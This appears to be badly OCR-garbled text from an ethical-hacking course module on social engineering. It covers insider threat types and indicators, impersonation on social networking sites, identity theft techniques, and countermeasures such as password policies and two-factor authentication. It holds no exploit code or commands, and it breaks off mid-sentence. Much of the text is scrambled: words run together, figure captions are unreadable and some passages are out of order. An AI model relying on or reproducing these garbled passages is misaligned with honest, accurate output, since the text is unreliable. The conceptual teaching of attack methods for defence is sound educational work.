personto seekrevenge,andthe companyis compromised.
maycome fromunhappy
‘Attacks employees
or contract workers
with negative
opinions
aboutthe company.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 BecomeFutureCompetitor
Currentemployees
mayplanto start their own competing businessand,byusingthe
company’s
confidentialdata,theseemployees mayaccess the systemto stealor alter

client
the company’s
list,
PerformCompetitors
Bidding
Due to corporate
espionage, employees
even the most honestand trustworthy can be
coercedinto
revealing
PublicAnnouncement
company’s
critical or
the through
briberyblackmail
information

A disgruntled
damages
the want
employee
may
company’s
to makea political
confidential
data
or socialstatement andso leaksor

InsiderThreatStatistics
Source:https://www.observeit.com
Although
maliciousintent is a serious factorfor organizationalsecurity,according
to a 2018
CostofInsider
ThreatsStudy, an attackcaused byemployee is costlier
or contractor negligence
than
theft
andcredentialtheft bya criminalor maliciousinsider:

Average
annualizedcost for three profiles
a8

Employee
or Criminaland Credential

Contractor
Malicious
Negligence Insider
Theft

9.12:Graph
Figure Insider
Showing ThreatStatistics

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of InsiderThreats
Types
Adtsqrontied
(©
terminated
employe
steals
destroys
or
thecompany’s
wo dataor
byInducingmalware
networksintentional oto

Inssers
(©
are potential
Simpl |
who uneductedon
bypass
securtythretsorwhe
generascurtypeocedures
to meetworkplace
reverent

eens

insiders
|@Harmful
their to
whouse technical
knowledge
identity

1Aninsder
with
access
asst
organisation
Compromise
by
outide
hrest
actorwhos
an
to rt ofa Seaton
‘ene
very

of InsiderThreats
‘Types
Thereare
four
types
of
insider
threats.
are:
MaliciousInsider
They

Maliciousinsiderthreatscome fromdisgruntled employees

or terminated whosteal
dataor destroy
companynetworksintentionally
byinjecting
malwareinto the corporate
network.
Negligent
Insider
Insiders,who are uneducatedon potential threatsor simply
security bypassgeneral
security proceduresto meet workplace efficiency,
are more vulnerable to social
engineeringattacks.Manyinsiderattacksresultfromemployee'slaxitytowardssecurity
measures,policies,
andpractices.
Professional
Insider
Professional
insiders
are the most harmful
insiders. knowledge
u se theirtechnical
They
to identifyweaknesses
and vulnerabilitiesi n the company’s
network and sell the
organization's
confidential
information or black-market
to competitors bidders.
Compromised
Insider
‘An
outsidercompromises
an insiderwho hasaccessto the criticalassetsor computing
devicesof an organization.
Thistypeof threatis more difficultto detects ince the
outsidermasquerades
asa genuineinsider.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Whyare Insider Attacks Effective?
Insiderattacksare effectivebecause:
+
Insiderattacks
c an go undetected
foryears,andremediation
is expensive.
+

+
Insider
attacksare easyto launch
insiderattacksis difficult;
Preventing an insideattackercan easily
succeed
Itis very difficultto differentiateharmfulactions fromthe employee's regular work.It is
hardto identify whetheremployees are performing malicious
activities or not.
Even after maliciousactivityis detected,the employee
may refuse to accept
responsibility
andclaimit was a mistake.
It is easyfor employees
to cover their actionsbyediting
or deleting
logsto hidetheir
malicious
of activities
ExampleInsiderAttack:Disgruntled
Employee
Most cases of insiderabusecan be traced to individualswho are introverts,incapable of
managingstress,experiencingconflictwith management, frustratedwith their jobor office
politics,craving respector promotion, transferred,demoted, or issuedan employment
termination notice,amongother reasons. Disgruntledemployees maypasscompanysecrets
andintellectualproperty for monetary
to competitors gain,thusharming the organization.
Disgruntled
employees programsto hidecompanysecretsand later
can use steganography
sendthe informationto competitors as an innocuous-looking suchas a picture,
message image,
oF soundfile usinga workemailaccount.No one suspects thembecause
the attackerhidesthe
stolensensitive informationin the pictureor imagefile,

ioe)
Degrurted
sere
tmployee
compaoy's

Figure9.13
company
Newent

ofInsider
Example

ical andCountermensores
Mackin ©by E-Comel
Copyright
 BehavioralIndicationsof an InsiderThreat

extant
om
Ti vemos
downing cpr serie dt

sing
moet
netwokos
or
EBeasing trent ot erent oe acu rom sens

TE cnoree
oapu a netnnega pone report in reeneorpenttre

ut
DIronnie
tonets
ftetogn tarts ces pal

Behavioral Indications of an Insider Threat

Indicatorsof insiderthreatsare generallyabnormaluser activities that deviatefrom regular
workactivities. Theserepresentunusualpatternsof user behaviorthat requirefurtheranalysis
to identify
maliciousmotives andintents. Themost common indicatorof insiderthreat is a lack
of employee awarenessaboutsecurity measures.
Thefollowing
are various behavioral
indicatorsof insiderthreats:
Alertsof DataExfiltr
Alerts of the unauthorizedgathering and transmission of data on the network can
represent an insideror malwareattack.Insiderscan alsouse paper,fax machines,
hard
drives,portable devices,and other computing equipmentto gather and transfer
sensitive
data,
or Modified
Missing NetworkLogs
Insiderstry to access the logfilesto delete, modify, andeditunauthorized access
events, file transferlogs,
andotherrecordsfrom systems andnetworkdevicesto avoid
detection.Alertsof logmodification,
deletion,
or access can indicateattacks

Changes
in NetworkUsage
Patterns
Changes of the network-specific
in the networkpatterns protocols,size of the packets,
frequency
sources and destinations, of user application
sessions,andbandwidthusage
can indicatemalicious
activity.
‘Multiple
FailedLogin Attempts
Theinsidercan try to login to unauthorizedsystems bybrute-force.So,
or applications
multiple
failedattempts mayindicatean insiderthreat
ical andCountermensores
Mackin ©by E-Comel
Copyright
 andTemporal
Behavioral Changes
changes
behaviorand temporal
Deviation fromestablished i n employee
behaviorsuch
as spending
capacity, travel,angermanagement
frequent issues,constant quarrels
with
colleagues,
andlethargy
i n performing
workare some of thefraudindicators.
UnusualTimeandLocationof Access
mismatch
‘Any i n the timelineof an event can besuspicious
threat.Forexample, if activitiesare loggedon employee andmayindicate a n insider
i n theirabsence.
systems
Missing or Modified Critical Data
Disgruntledemployeesmodify
can or deletesensitive datato damage the reputationof
the organization.
Unauthorized or Copying
Download of SensitiveData
Insidersuse legitimate and malicioustools to extract data from the organization's
perimeter.Insiderscan installmalware,
trojans,andbackdoors to stealinformation.
Sending SensitiveInformationto PersonalEmailAccount
information
Insidersmaysendcriticalorganizational to their personal
emailaccounts
with maliciousintent.
Logging
of DifferentUserAccountsfromDifferentSystems
Unusual times ofaccesscombined
loginto the account may represent a
with change i n the IPaddress
maliciousactivities.
ofthesystemusedto

‘Temporal
Changes
in Revenueor Expenditure

Unexpectedunexplained
and changesi n the financialstatus of an employee
signify
an
income generated
fromexternalsources. Theorganization
shouldaudit their financial
to identify
reports
whether
employee
the
to Physical
UnauthorizedAccess Assets
was involvedi n any malicious
activities.

Activitiessuchas employees usingauthorizedassetswithoutauthentication,tryingto

escalatetheir privileges
beyond their jobrequirements,
or tryingto gain physical
access
to theassetscan representa threat
Increase or Decreasein Productivity
Employees
who are unproductive,
of Employee
threatening,
have legitimate or illegitimatejob
concerns,anddisagree rights
with intellectualproperty tend to be suspicious.A sudden
increaseor decrease can signify
i n thelr productivity suspiciousbehavior.
InconsistentWorking Hours,UnusualBusiness andConcealed
Activities, or Frequent
ForeignTrips
Employees activities like unusuallogin
with suspiciousbusiness times,unusualoffice
hours, unauthorizedbrowsingand downloads, concealedtripsabroad,and meetings
with representatives
fromother countries or organizations mayposea threatto the
organization.
ical andCountermensores
Mackin ©by E-Comel
Copyright
 Dueto MentalInstability
ExtremeBehavior
Someemployees possess unpredictableand extreme behavior, suchas kleptomania,
and a suddenchange i n behavior may be due to mental instability.
This raises the
probability
that theywill performfinancialfraud,datatheft,or physical
theft,
Signs
of vulnerability
(Suchas Drug
or AlcoholAbuse,
FinancialDifficulties,
Gambling,
Mlegal
Activities)
Employees
with drugs,gambling,
badhabitssuchas
organization's
issues,may take a chanceto breachthe
andalcohol

monitor theactivities ofsuchemployees.

must regularly
abuse,
andrelationship
datafor money. Organizations

Complaint on SensitiveDataLeak
Informationor complaints regarding
sensitive dataleakscan represent
an insiderattack
Check for customer reviews andconcerns to identifyanomaliesandanalyze themto
identify
the insider.
Accessof Systems
‘Abnormal andUser Accounts
The mismatch betweenthe systems assigned
anduser accounts usedto access the
systemsmayindicatean insiderthreat.
Irresponsible
SocialMediaBehavior
Insidersmay attemptto create a negative byposting
impacto n the organization
unnecessaryinformationon socialmediawebsites.
Attempt
to AccessRestricted Zones
Employees
with maliciousintent may tryto access restrictedareas of the organization
to collectsensitive information,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

Social Engineering
Concepts ai acaiai on
ImpersonationSocial

2 Social
Engineering
TechalquesThott Hdentity

3) tnsidertireste Countermeasures

on Social Networking
Impersonation Sites
Today socialnetworking sites are widelyusedbymanypeople that allowthemto buildonline
profiles,shareinformationandmediasuchas pictures, blogentries,and music clips.Thus, itis
relativelyeasier for an attacker someone. Thevictim is likely
to impersonate to trust the
attackerandeventually revealinformationthatwouldhelpthemgain access to the system.
Thissection describeshowattackersperform socialengineeringthrough impersonation using
various socialnetworking sites suchas Facebook,
Linkedin,andTwitter,and highlights the risks
thesesitespose to corporatenetworks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SocialEngineering
through on Social
Impersonation
Sites
Networking
ous uses confidential
gather intormation
fe

thee fraudulent
‘nxaclarsuse profiles
toces bre
networksofrend nd extracti normatonung sol
dette ratnceringtectrques
ovpanuaton

Professional
Deas
purtalondonpinyBoorton
toons sore
esonatbetas
‘therforms
ofsel otc
engineering

SocialEngineering
through on SocialNetworking
Impersonation Sites
Associalnetworking
sites suchas Facebook,
Twitter,
and Linkedinare widely
used,
attackers
Thereare two waysan attackercan perform
cooptthem as a vehiclefor impersonation.
on socialnetworking
Impersonation sites:
By a fictitiousprofile
creating of the victim on thesocialmediasite
By stealing
thevictim'spassword
or indirectly
gainingaccess to thevictim'ssocialmedia
account
Socialnetworking sites are a treasure trove for attackersbecause peoplesharetheir personal
and professional information o n thesesites,suchas name, address, mobilenumber, dateof
birth,projectdetails,jobdesignation, company name, and location.The more information
people shareo n a socialnetworking site,the more likelyitis that an attacker
can impersonate
themto launchattacksagainst them,their associates, They
or their organization. mayalsotry
to join the target organization's employee groupsto extract corporate data
general,
In the information gather
attackers fromsocialnetworking
sites includes
organization
details,
professionaldetails, and personal
contacts and connections, details,whichtheythen
Useto execute otherforms
ofsocial
engineeringattacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 on Facebook
Impersonation

on Facebook
Impersonation
Source:https://www.facebook.com
Facebookis a well-knownsocialnetworking
site that connects people.
It is widely
used
betweenfriendswhosharecomments andupload links,
photos, and videos.To impersonate
userson Facebook,
fakeaccountsandtryto add“Friends―
information.
or
attackersuse nicknamesaliases insteadof their real names. They
profiles
to view others’
create
andobtaincriticalandvaluable

‘The a n attackertakesto lure a victim

steps revealing
into sensitive information:
Createa fakeuser groupon Facebook a s "Employees
identified of"thetargetcompany
2 falseidentity,
Using proceed to "friend,"
or invite actualemployees to the fakegroup,
“Employees
of Company XY2―

Users
join the groupandprovide
employment backgrounds,
theircredentialssuchas dateof birth,educationaland
or spouses’
names

Using
thedetailsof any one of the employees, an attackerc an compromise a secured
facility
to gainaccessto thebuilding
Attackerscreate a fakeaccount and scan the detailson the profilepagesof various targetso n
socialnetworking sitessuchas LinkedinandTwitter to engagei n spear phishing,
impersonation,
and
identity
theft

ical andCountermensores
Mackin ©by E-Comel
Copyright
=DUN
 SocialNetworking
Threatsto Networks
Corporate

ny BD eaitcaton
et content

Involuntary
DataLeakage MalwarePropagation

‘Targeted
Attacks Damage Reputat
to Business

Vulnerability, and
‘Network Infrastructure
Coste
Maintenance

Spam
and Loss
Phishing of Productivity

SocialNetworking
Threats to Corporate
Networks
Beforesharing
dataon a socialnetworking
site, or enhancing
their channels,
groups, or profiles,
usersshould
privateandcorporate beaware ofthefollowing
socialor technical
securityrisks:
Data sites are huge
Theft:Socialnetworking databases by many people
accessed
worldwide,
Involuntary
the
increasingriskof informationexploitation.
Data Leakage:
In the absenceof a strongpolicythat sets clear lines
betweenpersonal and corporate content,employeesmayunknowingly postsensitive
dataabouttheir companyon socialnetworking sites,whichmighthelpan attackerto
launchan attackon the targetorganization
Targeted
Attacks:Attackersuse the informationposted
on socialnetworking
sites to
launch targetedattackso n specific
usersor companies.
NetworkVulnerability: All socialnetworking to flawsandbugs
sitesare subject suchas
loginissues and Java vulnerabilities,
whichattackerscouldexploit. Thiscould,
i n turn,
leadto the leakage of confidential
information relatedto the targetorganization’s
network.
and Phishing:
‘Spam Employeesusingwork e-mailIDs o n socialnetworking
sites will
probably receive spam and become targetsof phishing attacks,
which could
the organization's
‘compromise network.
Modification
of Content:In the absenceof proper securitymeasures and effortsto
preserveidentity, channels,
blogs, groups,profiles,
andother platformscan be spoofed

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Malware
Propagation: sites are idealplatforms
Socialnetworking for attackersto
spread viruses, bots,worms, trojans,spyware,andothermalware.
Business Reputation: Attackerscan falsifyinformationabout an organization or an
employee on socialnetworking sites,resulting
in lossof reputation,
Infrastructureand MaintenanceCosts:Using socialnetworking sites entailsadded
infrastructure
and maintenance resources for organizations
to ensure that their
defensivelayers
are effectivesafeguards.

Loss of Productivity:
Organizationsmust monitor employees’network activities to
maintain
security do
andensure that suchactivities not misusethesystemandcompany

ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow

Concepts
Social Engineering
Sites
Networking

2
Social
Engineering
Techniques
Tdontity
Thott
3) tnsidertireste Countermeasures

Identity
Theft
CEH
thefts a rime i n which an
\@ Identity yourpersonally
steals identifiableinformation

security
imposter suchas
name,creditcard number, socal or driver's
lcensenumbers,
et. t o commitfraudor other

“a:
rttackerscan
seces facies
use
ofa and employeestarget
identitytheftto impersonate organizationphysically

Identity
Theft
‘Types
of

ical
Mackin
and Copyright
©
by Countermensores E-Comel
 Theft (Cont'd)
Identity
‘Common
Techniques
Use
fo
Identity
Theft
‘Personal
Attackers
Informationfor
Obtain
Indicationsof identity
Theft
of Pretent
Tra walescomputer
apts, callphones
ee "6 Unf hago your ca cae

Hacking
=
=

(compromising

ssineing ‘Mal
Theftn d Rerouting ——

IdentityTheft
theft is a problem
Identity that manyconsumers facetoday. In theUnitedStates, some state
legislators
have imposed employees
lawsrestricting from providingtheir SSNs (Social
Security
Numbers)
during
their Identity
theft
frequently
figures
recruitment.
shouldbe informedabout identity
initiatives.
in news reports.
theft so that theydo not endanger
Companies
their own anti-fraud

typesof identity
identitytheft, including
This section discusses theft,common techniques
attackersuse to obtain personalinformationfor identity
theft,and various indicationsof
identity
‘The
theft
IdentityTheftand Assumption Deterrence Act of 1998definesidentity
theft as the illegal
Use of someone's
identifiable
identification.
Identity
theft occurs whensomeone stealsothers’
informationfor fraudulentpurposes. Attackersillegally
informationto commit fraudor othercriminalacts.
obtainpersonally
personally
identifying
of personally
‘Types identifiable stolenbyidentity
information thieves:
Name +
Bankaccount number
+

+
office
address Credit
Homeand
Socialsecurity
number
*

+
cardinformation
Creditreport
Phonenumber

Date
birthof
Driving license
number
Passport
number

ical andCountermensores
Mackin ©by E-Comel
Copyright
 attackerstealspeople’s
‘The identity
forfraudulent
purposessuchas:
=

‘=
To opennew
credit
Toopen a new phone
cardaccountsin the nameo f the user withoutpayingthe
account i n theuser'sname, or to run up charges
or wireless on
bills
theirexistingaccount
informationto obtainutilityservicessuchaselectricity,
To use thevictims’ heating,
or
cable
TV
To open bankaccountswiththeintention
information of
writing checks
bogus usingthevictim's

Toclonean ATMor debitcardto makeelectronicwithdrawalsfromthevictim's

accounts
Toobtainloansforwhichthe victim is lable
Toobtaina driver'slicense, or otherofficial1D
passport, cardthat containsthevictim's
datawith theattacker'sphotos
the victim'sname andSocial
Using numberto receive theirgovernment
Security
benefits
an employee
To impersonate of a target
organization access its facility
to physically
insurance policies
To takeover the victim’s
Tosellthevictim’s
personal
information
Toordergoods
onlineusing a drop-site
To hijack
emailaccounts
Toobtainhealthservices
Tosubmitfraudulent
tax returns
To commit othercrimes with the intention of providing
thevictim'sname to the
authoritiesduring
arrest,insteadof their own
‘Types
of Identity
Theft
Identity
theft is constantly
increasing,and identity
thievesare finding
n ew ways or techniques
to stealdifferent Someofthetypesof identity
typesoftargetinformation. theftare as follows:
Child
Identity
Theft
Thistypeof identitytheft occurs whenthe identity of a minor is stolen.Thisis desirable
because it maygo undetected for a long
time. Afterbirth,parents apply for a Social
SecurityNumberfor their child, whichalong with a differentdate of birth,is usedby
identity
thieves
liveandapply
to apply
for creditaccounts,
for government benefits.
loansor utilityservices,or to rent a place
to

ical andCountermensores
Mackin ©by E-Comel
Copyright
Criminal
Identity Theft
Thisis one of the most common and most damaging typesof identity
theft. A criminal
uses someone's identity to escape criminalcharges. Whentheyare caught or arrested,
theyprovide the assumedidentity. The bestway to protectagainstcriminalidentity
theft is to keepall personal informationsecure, whichincludesfollowing safeInternet
practices andbeing cautiousof “shoulder
surfers.―
FinancialIdentity
Theft
This type of identitytheft occurs when a victim's bank account or credit card
is stolenandillegally
information usedbya thief.They
c an max out a creditcardand
withdraw money from the account,or can use the stolen identity to open a new
account,apply fornew creditcards,andtakeout loans. Theinformation that is required
to hackinto thevictim'saccount andstealtheir informationis obtainedthrough viruses,
phishingattacks,or databreaches.
Driver'sLicenseIdentityTheft
This
type
losetheir driver'slicense,
the perpetrator
as alittle
of identitytheft is the easiest it requires
or it can easily
sophistication.A personcan
be stolen.Once it falls into the wronghands,
can sellthe stolendriver'slicenseor misuse it bycommitting traffic
violations, of whichthe victim is unaware of andfails to pay finesfor,ending up with
their licensesuspended or revoked.
InsuranceIdentity
Theft
Insurance identity relatedto medicalidentity
theft is closely theft. It takesplace
whena
perpetrator unlawfullytakesthe victim's medicalinformation to accesstheir insurance
for medicaltreatment. Its effectsincludedifficultiesi n settling medicalbills,higher
andprobable
insurance premiums, troublei n acquiringfuturemedical
coverage.
MedicalIdentityTheft
Thisis the most dangerous typeof identity theft wherethe perpetrator
uses thevictim's
name or information withoutthe victim’s consent or knowledgeto obtainmedical
products and claim health insurance or healthcareservices. Medical identity theft
resultsi n frequent erroneous entries i n the victim's
medical whichcouldleadto
records,
falsediagnoses andlife-threateningdecisions bythedoctors.
TaxIdentity
Theft
Thistypeof identity theft occurs whenthe perpetratorstealsthe victim’s
SocialSecurity
Numberto file fraudulent tax returns and obtain fraudulenttax refunds.It creates
their legitimate
difficultiesfor the victim i n accessing tax refundsandresultsi n a lossof
funds.Phishing emailsare one ofthe main tricksusedbythe criminalto steala target's
information.Therefore, protectionfromsuchidentitytheft includesthe adoption of safe
Internetpractices,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Identity
Cloning
andConcealment
This type of identitytheft encompasses all forms of identitytheft, where the
perpetratorsattemptto impersonate someone else simplyi n order to hide thelr
identity. couldbe illegal
Theseperpetrators thosehiding
immigrants, fromcreditors,or
simply thosewho
Synthetic
Identity
Theft
want
to become “anonymous.―

Thisis one of the most sophisticatedtypesof identity theft, wherethe perpetrator

obtainsinformationfromdifferentvictims to create a new identity.
Firstly,
he stealsa
SocialSecurity Numberand uses it with a combinationof fake names, date of birth,
address,andotherdetailsrequiredforcreating a new identity.Theperpetratorusesthis,
new identity to open new accounts, loans,credit cards,phones, other goods, and
services.
SocialIdentity
Theft
Thisis anothercommon typeof identity theft wherethe perpetratorstealsvictim's
SocialSecurityNumberi n orderto derivevarious benefitssuchas sellingi t to an
undocumentedperson,usingit to defraudthe government bygetting@ new bank
account,loans, or applying
creditcards, for andobtaininga new passport.

Common Techniques Attackers Use to Obtain Personal Information for Identity

Theft
Discussed
of criminal
beloware some the methodsbywhichattackersstealtargets’
turn allowthemto commit fraudandother activities:
identities,
whichin

of
Theft wallets,
personal
laptops,
computers,
information
cell phones,
backup
media,
andother sources of

Physical
theft is common. Attackerssteal hardwarefrom places
suchas hotelsand
recreationalplacessuchas clubs,restaurants, Givenadequate
and beaches.
parks, time,
theycan recover valuabledatafromthesesources
Internet Searches
Attackerscan gather a considerablea mount of sensitive informationvia legitimate
Internetsites,usingsearchenginessuchas Google,Bing,andYahoo.
SocialEngineering
Socialengineering is the art of manipulating
people
into performingcertain actions or
divulgingpersonal information andaccomplishing
their task without usingcracking
methods.
Dumpster
Diving Surfing
andShoulder
rummagethrough
‘Attackers householdgarbageandthetrashbinsof organizations,
ATM
centers,hotels,and other places
to obtain personaland financialinformationfor
fraudulentpurposes.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Criminals byglancing
may find user information observing
at documents, personal
identificationnumbers(PINs)
typedinto automatic teller machines(ATM),
or by

‘overhearing
conversations.
Phishing
may pretend
The “fraudster― to be froma financialinstitution or otherreputable
and send spamor pop-upmessages
organization to trick users into revealing
their
personal
information.
Skimming
‘Skimming
refersto stealing debitcardnumbersbyusingspecial
creditor devices
storage
calledskimmers
or wedges
whenprocessingthecard.
Pretexting
Fraudsters may impersonate executives from financialinstitutions, telephone
companies,andotherbusinesses. Theyrelyon “smooth-talking―
andwin the trust of an
individual
to reveal
sensitive information.
Pharming
Pharming, alsoknownas domainspoofing, is an advanced formof phishingi n whichthe
attackerredirectsthe connection betweenthe IP addressand its targetserver. The
attackermayuse cachepoisoning(modifying the Internet addressto that of a rogue
address)to do so, Whenthe users typein the Internet address,it redirects themto 2
roguewebsitethat resemblesthe original.
Hacking
(compromising system)
a user's
‘Attackers
may compromise user systems androuter informationusing listening
devices
and scanners.They
suchas sniffers gain accessto an abundance of data,decryptit (if
necessary),
anduse it for identity
theft.
Keyloggers
and Password (Malware)
Stealers
‘An
attackermayinfectthe user’s computerwith trojans,viruses, or othermalwareand
then recordandcollectthe user’s keystrokes
to stealpasswords, usernames,andother
sensitive informationof personal,financial,
or business import.
may alsouse emailsto sendfakeforms,
‘Attackers suchas InternalRevenue Service(IRS)
forms, to gather
Wardriving
information
fromtheir
victims.
‘Attackers
search
for unsecuredWi-Fi wirelessnetworksi n movingvehicles
containing
laptops,
smartphones, Oncetheyfind unsecurednetworks,
or PDAs. theyaccess any
sensitive informationstored
on thedevices
of theuserson thosenetworks.

Theft
‘Mail andRerouting
Often,mailboxescontain bank documents(creditcards or account statements),
administrativeforms,and other importantcorrespondence. Criminalsuse this
informationto obtaincreditcardinformationor to reroute the mailto a new address.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Indications of Identity
Theft
People
do not realizethat theyare the victim of identity
theft until theyexperience some
unknownand unauthorizedissuesas a result of the theft.Therefore, it is of paramount
that people
importance watch out for the warningsignsthat their identities have been
Listedbeloware some ofthesignsofidentity
compromised, theft:
=
Unfamiliarchargesto yourcreditcardthat youdo not recognize.
=
Nolonger
receive creditcard,
bank,
or utility
statements
Creditors callaskingaboutan unknownaccount o n yourname.
=
Thereare numerous trafficviolationsunderyourname thatyou didnot commit.
=
Youreceive charges
formedicaltreatment or services you never received.
Thereis more thanone tax return filedunderyour name.
Beingdeniedaccess to your own account and unableto take out loansor use other
services.
Not receivingelectricity,
gas,water,or otherservices billsdueto stolenmail
Suddenchanges
from,
in
your personal
medicalrecordsshowing
a conditionyou do
not suffer

additional
‘Some of identity
indications theftare as follow:
Getting a notificationthat your informationwas compromised
or misusedbya data

a
inexplicable
‘An
an
breachin companywhereyou are an employee
cashwithdrawal
or have

fromyour bankaccount,
account.

Callsfrom debit or credit card fraud control departments

giving warningsabout
suspicious
activities
onyour
accounts.
A refusalof government
benefitsto you andyour childbecause
those benefitsare
already
beingreceivedbysome other account usingyour child’s
SocialSecurity
Number.
Your medicalinsurance planrejectsyour authenticmedicalclaimbecausesomeone
tamperedwithyourmedicalrecords, causingyouto reach yourbenefitlimit.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

2 Social
Engineering
TechniquesThott Hdentity

3) taidermascate
(©) Comes

Countermeasures
Socialengineersexploit humanbehavior(such as manners, enthusiasm towardwork,laziness,
or naivete)to gain access to the targeted company's informationresources. Socialengineering
attacksare difficultto guard
deceived.They
against,as the victim might
or
not be aware thathe shehasbeen
a re very muchlike the other kindsof attacksusedto extract a company’s
valuabledata.Toguard againstsocialengineeringattacks, a companyneedsto evaluate the risk
of different kinds of attacks, estimate possible lossesand spread a wareness among its
employees.
can implement
Thissection dealswithcountermeasuresthatan organization to bemore secure
socialengineering attacks.
against

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SocialEngineering
Countermeasures

PhysicalSecurityPolicies Defense Strategy

Train
Individuals
on
secur pices

Presence
ofincldence
response authentiation
proper time Implement
two-factor

Avail of resources onyto authorizedusers documented

‘Adopt change
management

fare isroglariyupdated

SocialEngineering
Countermeasures
Attackers socialengineeringtechniques
implement to trickpeople
into revealing
organizations’
confidentialinformation.They to perform
use socialengineering fraud,identity
theft,industrial
espionage,and other disreputable To guard
behaviors. againstsocialengineeringattacks,
organizations must developeffectivepolicies
and procedures;however, merelydeveloping
themis not enough.

ical andCountermensores
Mackin ©by E-Comel
Copyright
To betruly
effective, should:
an organization
=
policies
Disseminate amongemployees
and provide
proper educationand training.
Specialized
trainingbenefits employees
i n higher-tisk
positionsagainstsocial
engineeringthreats.
Obtainemployee signatures
on a statement acknowledging
that theyunderstandthe
organization's
policies.
=

Define ofpolicy
violations,
the consequences
The main objectivesof socialengineeringdefensestrategies
are to create user awareness,
robustinternalnetworkcontrols, policies,
and security plans,
andprocesses.
Officialsecuritypolicies helpemployees
and procedures or users makethe rightsecurity
They
decisions.
Password
should
include
the safeguards:
Policies
following

Password statingthe following

policies guidelines
helpto increasepassword
security:
©

Change regularly.
passwords
© Avoid passwords that are easyto guess.It is possibleto guesspasswords from
answersto socialengineering questionssuchas, “Where
were you born?―"Whatis
or "Whatis your pet's
your favoritemovie?― name?"
Blockuser accountsif a user exceedsa certain numberof failedattemptsto guessa
password.
Chooselong(minimumof 6 8 characters)
-
and complex
(using
various
alphanumeric
andspecial
characters)
passwords.
© passwords
Donot disclose to anyone.
Password policies
Security oftenincludeadviceon properpassword for
management,
example:
Avoid sharing
a computer
account.
Avoidusingthesame password
fordifferentaccounts.
Avoid storingpasswords
on mediaor writingthem down on a notepad
or sticky
note.
Avoid communicating
over
passwordsthe phone
or through

Besure to lockor shutdownthecomputer

email or SMS.
beforestepping
awayfromit.
Physical
Security Policies
Physical
security policies
addressthe followingareas,

© Issue identificationcards(IDcards), along

and uniforms, with other access control
measuresto the employees of the organization,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Officesecurity
or personnel
must escort visitors to designated
visitor rooms or
lounges.
areas of an organization
Restrict access to certain to preventunauthorizedusers
fromcompromising the security
of sensitive data,
Disposeof old documentsthat contain valuableinformationbyusing equipment
suchas paper shredders andburnbins. Thispreventsinformation gathering by
attackersusing techniques
suchas dumpster diving.
Employ
securitypersonnel to protect people
i n an organization and property —

supplement
trained securitypersonnel
with alarmsystems, surveillancecameras,
and
other
equipment.
Defense Strategy
© SocialEngineering
Campaign: shouldconductn umerous social
An organization
engineering exercises using different techniqueso n a diversegroup of peoplein
orderto examine howits employees mightreact to realsocialengineeringattacks.
GapAnalysis:Using theinformationobtainedfromthe socialengineeringcampaign,
a gap analysisevaluatesthe organization basedon industry-leading practices,
threats,
‘emerging andmitigation strategies.
RemediationStrategies:Depending upon the result of the evaluationin the gap
analysis,
organizations develop a detailed remediationplanto mitigate the
or the loopholes
‘weaknesses found in the earlierstep.The planfocusesmainly on
educating
and creatingawareness amongemployees basedon their roles and
identifying
andmitigatingpotential
threatsto theorganization,
additionalcountermeasures against
‘Some socialengineeringare as follows:
=
Train Individualson Security Policies:An efficient trainingprogram consistsof basic
socialengineeringconcepts and techniques, all securitypolicies,
and methodsto
increase awareness of socialengineering.

Implement
Proper Thereshouldbe administrator,
AccessPrivileges: user, and guest
levelsofauthorization,
accountswith respective
Presence of a Proper IncidenceResponse Time:Thereshouldbe properguidelines for
to a socialengineering
reacting attempt.
Availability
of Resources Only to Authorized
Users:Makesure sensitive information
is
securedandthat resources are onlyaccessedbyauthorizedusers
ScrutinizeInformation: Categorize
the informationas top secret,proprietary,
for
andforpublic
internalu se only, use,or use othercategories.
Performa Background
Checkand ProperTerminationProcess:Insiderswith a criminal
background employees
andterminated for procuringinformation.
are easytargets
Anti-VirusandAnti-Phishing
Defenses: Usemultiple layers of anti-virus defenses
at
end-userandmailgateway
levelsto minimize socialengineering attacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Implement Two-FactorAuthentication: Insteadof fixedpasswords,use two-factor
authenticationfor high-risk
network services suchas VPNsand modempools. In the
two-factor (TFA)
authentication approach, theuser must present
two different
formsof
proofof identity. then theyneedto
If an attackeris tryingto breakinto a user account,
breakboth
in-depth forms
user multifactor
difficult
of identity,whichis more
authentication
mechanism
security and partof the
piecesof evidencethat a user provides
to do.Hence,

couldincludea physical
TA is a defense-
family.Thetwo
tokensuchas a card,
and is typically
something the personcan rememberwithout mucheffort, suchas a
securitycode,PIN,or password.
‘Adopt
Documented Change Management: A documented change-management process
is more secure thanthe ad-hocprocess.
Ensure aRegular Update of Software:Organizations shouldensure that the system
and
softwareare regularly
patched andupdated as the attackersexploitunpatched andout-
of-datesoftwareto obtainusefulinformationto launchan attack.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 InsiderThreats
Detecting

1 data
risk
presents
another
InsiderR isk
‘Controle secrty
professional
Insider ayerof compen
or whch eques

be | ofcontain ad
iT
hesecuntyframeworkmust commended
safeguards, actionsbytheemploye
profesional,eparation dts, aesiringoiler ete
Controls
ata
sect prtesonals
os Prevention,
anus too suchasDLP(Symantec
te) andAM (SiPointerty
DataLossPrevention,
Secret
ASASec Suiteete) to deterier tests

analyze
profesionalmust
‘Secu ee a varity ofscurty controlsa ndtol t o and
d etectn ie

05/1PS be
etc), Event
uch as
os Pont Sofware
(Check
Sytem, logManagem (solarvinds
iv NextGen
cogthythm
de, 18 MSecu Network
Scart
Pltform,te] may sed
S IEM
Manager,
nruson Prevention
te), andSIEM(ESI
Splunk

InsiderThreats
Detecting
Most data attackscome from insiders, whichonlymakesthem more difficult to preventor
detect. Insidersare mostly
of
aware the security

to thwartandmayincur huge
are difficult
loopholes
themto stealconfidentialinformation.It is essentialto carefully
financial
andthey
oftheorganization, exploit
handleinsiderthreatsas they
lossesand businessinterruptions.Someof
